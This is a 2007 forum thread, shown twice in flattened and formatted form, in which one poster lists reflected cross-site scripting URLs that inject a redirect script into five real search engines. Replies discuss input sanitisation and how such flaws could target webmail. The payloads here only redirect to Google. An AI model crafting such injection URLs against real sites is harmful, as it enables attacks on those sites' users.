Topic: Google taking over other search engines! (aka fun with XSS) (Page 1 of 1) $Pages that link to <a href="https://ozoneasylum.com/backlink?for=29278" title="Pages that link to Topic: Google taking over other search engines! (aka fun with XSS) (Page 1 of 1)" rel="nofollow" >Topic: Google taking over other search engines! (aka fun with XSS) <span class="small">(Page 1 of 1)</span>\$

wrayal Bipolar (III) Inmate From: Cranleigh, Surrey, England Insane since: May 2003	posted 06-12-2007 17:11 Brainboost: http://www.brainboost.com/search.asp?Q=%22%3C/title%3E%3Cscript%3Edocument.location='http://www.google.com'</script> Lycos: http://search.lycos.com/?query=%3C%2Ftitle%3E%3Cscript%3Edocument.location%3D%27http%3A%2F%2Fwww.google.com%27%3C%2Fscript%3E&x=31&y=11 Hotbot: http://www.hotbot.com/?nil_suggest=btn&ps=&loc=searchbox&tab=web&mode=search&currProv=ask&query=%3C%2Ftitle%3E%3Cscript%3Edocument.location%3D%27http%3A%2F%2Fwww.google.com%27%3C%2Fscript%3E Ask: http://uk.ask.com/web?q=a&search=search&dm=all&qsrc=0&o=312&l=dir&jss=%22%3E%3C/a%3E%3Cscript%3Edocument.location='http://www.google.com'%3C/script%3E Chacha: http://search.chacha.com/search/query?query=%22%3Bdocument.location%3D%22http%3A%2F%2Fwww.google.com all googlicised! Wrayal
Tyberius Prime Maniac (V) Mad Scientist with Finglongers From: Germany Insane since: Sep 2001	posted 06-13-2007 00:12 br... you'd think the at sanitize their input somewhat.
poi Paranoid (IV) Inmate From: Norway Insane since: Jun 2002	posted 06-13-2007 01:10 why would they ? user input is always clean and well intended.
wrayal Bipolar (III) Inmate From: Cranleigh, Surrey, England Insane since: May 2003	posted 06-13-2007 01:12 Poi: Seriously? I agree XSS looks harmless at first, but what (say) if you found a similar flaw in the search function for gmail.google.com and formed a carefully crafted link there? These are only fun but...meh...
poi Paranoid (IV) Inmate From: Norway Insane since: Jun 2002	posted 06-13-2007 01:42 No. I was kidding. Of course input, any input, MUST be sanitized. At work, people get slammed whenever they don't sanitize user or 3rd party input. Seriously. And our QA people can come up with really sneaky ways to inject script and have us fix our code.
wrayal Bipolar (III) Inmate From: Cranleigh, Surrey, England Insane since: May 2003	posted 06-13-2007 01:45 Oh hehe, ok. Sorry, I misread it as serious. I was sad to find out that the only one that had taken any effort (ask) was already in MOSEB =(

Topic: Google taking over other search engines! (aka fun with XSS) (Page 1 of 1) $Pages that link to <a href="https://ozoneasylum.com/backlink?for=29278" title="Pages that link to Topic: Google taking over other search engines! (aka fun with XSS) (Page 1 of 1)" rel="nofollow" >Topic: Google taking over other search engines! (aka fun with XSS) <span class="small">(Page 1 of 1)</span>\$

wrayal
Bipolar (III) Inmate

From: Cranleigh, Surrey, England
Insane since: May 2003

posted 06-12-2007 17:11

Brainboost:
http://www.brainboost.com/search.asp?Q=%22%3C/title%3E%3Cscript%3Edocument.location='http://www.google.com'</script>
Lycos:
http://search.lycos.com/?query=%3C%2Ftitle%3E%3Cscript%3Edocument.location%3D%27http%3A%2F%2Fwww.google.com%27%3C%2Fscript%3E&x=31&y=11
Hotbot:
http://www.hotbot.com/?nil_suggest=btn&ps=&loc=searchbox&tab=web&mode=search&currProv=ask&query=%3C%2Ftitle%3E%3Cscript%3Edocument.location%3D%27http%3A%2F%2Fwww.google.com%27%3C%2Fscript%3E
Ask:
http://uk.ask.com/web?q=a&search=search&dm=all&qsrc=0&o=312&l=dir&jss=%22%3E%3C/a%3E%3Cscript%3Edocument.location='http://www.google.com'%3C/script%3E
Chacha:
http://search.chacha.com/search/query?query=%22%3Bdocument.location%3D%22http%3A%2F%2Fwww.google.com

all googlicised!

Wrayal

Tyberius Prime
Maniac (V) Mad Scientist with Finglongers

From: Germany
Insane since: Sep 2001

posted 06-13-2007 00:12

br... you'd think the at sanitize their input somewhat.

poi
Paranoid (IV) Inmate

From: Norway
Insane since: Jun 2002

posted 06-13-2007 01:10

why would they ? user input is always clean and well intended.

wrayal
Bipolar (III) Inmate

From: Cranleigh, Surrey, England
Insane since: May 2003

posted 06-13-2007 01:12

Poi: Seriously? I agree XSS looks harmless at first, but what (say) if you found a similar flaw in the search function for gmail.google.com and formed a carefully crafted link there? These are only fun but...meh...

poi
Paranoid (IV) Inmate

From: Norway
Insane since: Jun 2002

posted 06-13-2007 01:42

No. I was kidding. Of course input, any input, MUST be sanitized.

At work, people get slammed whenever they don't sanitize user or 3rd party input. Seriously. And our QA people can come up with really sneaky ways to inject script and have us fix our code.

wrayal
Bipolar (III) Inmate

From: Cranleigh, Surrey, England
Insane since: May 2003

posted 06-13-2007 01:45

Oh hehe, ok. Sorry, I misread it as serious. I was sad to find out that the only one that had taken any effort (ask) was already in MOSEB =(

Post Reply

Your User Name:
Your Password:
Login Options:	Remember Me On This Computer

Your Text: Insert Slimies » Insert UBB Code » Close Last Tag \| All Tags UBB Help	Loading...
Options:	Show Signature Enable Slimies Enable Linkwords

Topic: Google taking over other search engines! (aka fun with XSS) (Page 1 of 1)

Insert Slimies »

Insert UBB Code »